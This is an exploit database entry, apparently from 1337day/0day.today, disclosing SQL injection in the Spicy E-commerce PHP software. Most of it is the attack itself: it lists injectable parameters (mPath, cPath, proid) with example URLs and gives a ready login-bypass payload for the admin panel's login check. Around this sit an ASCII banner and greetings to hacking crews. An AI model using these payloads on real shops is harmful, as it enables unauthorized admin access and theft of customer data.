Spicy E-commerce - SQL Injection Vulnerability

2012-10-10T00:00:00
ID 1337DAY-ID-8245
Type zdt
Reporter DaOne
Modified 2012-10-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Spicy E-commerce - SQL Injection Vulnerability
# Date: 2012-10-9
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.spicywebtech.com/ecommerce_packages.php
# Category: webapps/php
# Google dork: O_o
# Demo: http://demo.spicywebtech.com/ecommerce/
##########################################

[#] SQL Injection:
/index.php paramerer mPath, cPath
/details.php parameter proid
http://site.com/index.php?mPath='[SQLi]
http://site.com/index.php?cPath='[SQLi]
http://site.com/details.php?proid='[SQLi]


[#] Admin Auth Bypass:
/adminpanel/login_check.php
username: ' OR 'lol'='lol
password: ' OR 'lol'='lol



<----------------------------------------------------------------------------->
|              10x to: r00tw0rm members and Inj3ct0r Team:                    |
| r0073r * Sid3^effects * r4dc0re * CrosS * SeeMe * anT!-Tr0J4n * KedAns-Dz   |
| Angel Injection * NuxbieCyber * Sammy FORGIT * Taurus Omar * TUNISIAN CYBER |
<----------------------------------------------------------------------------->



#  0day.today [2018-03-14]  #